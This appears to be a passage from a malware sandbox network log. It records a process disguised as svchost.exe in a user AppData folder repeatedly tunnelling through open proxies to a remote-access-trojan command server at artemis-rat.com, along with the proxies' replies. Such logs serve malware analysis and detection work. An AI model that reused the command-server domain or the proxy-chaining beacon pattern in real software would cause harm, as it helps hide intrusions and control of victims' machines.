                                                                                    Mar 9, 2024 13:14:35.783052921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.195820093 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3388192.168.2.56084360.205.132.718043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.784499884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.111804962 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3389192.168.2.560252157.119.222.22808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.790009022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3390192.168.2.560830201.13.147.161567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.790010929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3391192.168.2.560864147.75.34.868043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.790397882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.092363119 CET65INHTTP/1.1 200 Connection Established
                                                                                    Proxy-Agent: Zscaler/6.3
                                                                                    Mar 9, 2024 13:14:36.092679977 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 aa 59 45 77 e2 37 43 f6 ff a1 db 68 be 19 62 ee 70 9d ee 73 f1 c6 98 ce ee 57 07 c1 c4 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: lheRYEw7ChbpsW*,+0/$#('=<5/artemis-rat.com#.i,7wpn(E6uJ+l0A;lh_TujssX
                                                                                    Mar 9, 2024 13:14:36.401959896 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 ac 8e 90 ff d4 8a 36 46 be d2 21 cf 54 66 89 f6 69 1b d9 c7 37 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                    Data Ascii: C?eR6F!Tfi7DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                    Mar 9, 2024 13:14:36.402225018 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                    Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                                                                    Mar 9, 2024 13:14:36.402350903 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                                                                    Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                                    Mar 9, 2024 13:14:36.703941107 CET736INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                                                                    Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ
                                                                                    Mar 9, 2024 13:14:36.705840111 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 7d 83 2a 23 24 7f 05 e4 0f d9 d5 68 9d a5 ea bb f5 ef e1 9e 87 34 dc 97 28 19 b6 72 7b 05 fc 03 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 d4 6e bb b5 f3 6a 44 23 3a 4b f6 82 99 fa 9c 2d c2 6b e5 a1 57
                                                                                    Data Ascii: %! }*#$h4(r{(njD#:K-kWjJ~gW
                                                                                    Mar 9, 2024 13:14:37.008728981 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 a9 9d f0 34 4d a0 e2 87 3b ef f0 83 ae 87 70 f7 7d a4 38 93 89 31 ca 5f a8 50 03 9c 75 9a 42 a5 00 71 92 49 09 02 20 2c 58 af a0 e3 9e ef b7 49 a8 91 99 df 93 52 b9 9d ed c4 10 a7 63 07 85 a3 33 df 9b
                                                                                    Data Ascii: 4M;p}81_PuBqI ,XIRc31xKh<{k68>KQeF {MZYA*oBYV2e{O_Vx$~J6lvYiLI(3K6"B
                                                                                    Mar 9, 2024 13:14:37.009803057 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 5e b6 cc 6a 7a 0f 2e 35 14 3a 79 79 d5 b1 37 f0 ec 21 6f b9 2d 3e 6f 51 8d 0a 46 f7 cf c6 b2 fd 04 9e ea 82 b9 50 90 f1 3d 11 c1 da 92 cb b6 aa 53 ee 95 b0 a5 86 8c a7 a6 30 08 54 1e e4 28 dd fb cc 47 c8 a1
                                                                                    Data Ascii: ^jz.5:yy7!o->oQFP=S0T(G1e7_{rdlWby6M:4UUF0SqYSnz_YK$z2Hn`=resbha=};DJthFwnYTLe9S
                                                                                    Mar 9, 2024 13:14:37.318003893 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 14 fc 24 3c 2e c8 3d 1a f1 7d 8b db b4 4f b9 97 bf 6e 70 34 2e ac 06 2c 2d 89 22 01 d1 7c 5e a5 fe f9 d9 37 9c fd 25 e6 dc a0 24 ef a0 2d 74 c6 bd ea 23 db c0 ff 44 35 84 1c 7e 74 0a a6 de 9d b4 90 7c 1d 08
                                                                                    Data Ascii: q$<.=}Onp4.,-"|^7%$-t#D5~t|9&%_K3^m$c'I6QdaU~vVzqeRY07%WYj]Jii)P]V|k#p$5:;pj@"=H}[v1
                                                                                    Mar 9, 2024 13:14:37.318038940 CET1286INData Raw: 1a c6 28 7a 4a e0 77 31 11 43 fb 59 aa 3d 13 fa fd 5b 37 96 d5 74 a1 64 ab e7 ab 94 7f 3b 6f ba 78 f1 ac c9 26 80 16 4f f8 38 9a b2 95 35 7a 51 52 bd f9 20 e4 91 a6 a0 ce a2 42 22 f9 11 c2 8f 78 cf 10 d5 4f de 3d aa 9e eb 44 16 52 4c 9b e2 00 2c
                                                                                    Data Ascii: (zJw1CY=[7td;ox&O85zQR B"xO=DRL,DY/!DwT*dq#mD`vggJ>&$lVT[?]i-?pege6d2"\fOWQ%^~ysdq?r(G,


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3392192.168.2.556367220.121.137.183312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.790410042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3393192.168.2.560848178.128.113.1182312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.790633917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.142713070 CET1286INHTTP/1.1 502 Bad Gateway
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3693
                                                                                    X-Squid-Error: ERR_CONNECT_FAIL 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3394192.168.2.55639462.243.56.95312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.790936947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.849189043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3395192.168.2.56085994.130.94.458043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.791129112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3396192.168.2.560191181.209.78.7699943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.791860104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3397192.168.2.558776103.228.244.211808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.798866987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3398192.168.2.56032214.160.26.1051913243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.806924105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3399192.168.2.56022741.223.232.117312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.815968990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3400192.168.2.5608853.123.150.192312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.822482109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.133464098 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3401192.168.2.560393162.214.75.795216343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.825047016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.849267960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3402192.168.2.559651192.252.220.921732843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.826968908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3403192.168.2.560314182.48.77.173867443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.827572107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.645961046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3404192.168.2.560895217.182.153.291200043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.838150024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.334114075 CET131INHTTP/1.1 503 Too many open connections
                                                                                    Content-Type: text/plain
                                                                                    Connection: close
                                                                                    Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                    Data Ascii: Maximum number of open connections reached.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3405192.168.2.56089791.189.177.186312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.843900919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.194312096 CET1286INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/5.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3628
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from lb1
                                                                                    X-Cache-Lookup: NONE from lb1:3128
                                                                                    Via: 1.1 lb1 (squid/5.7)
                                                                                    Connection: close
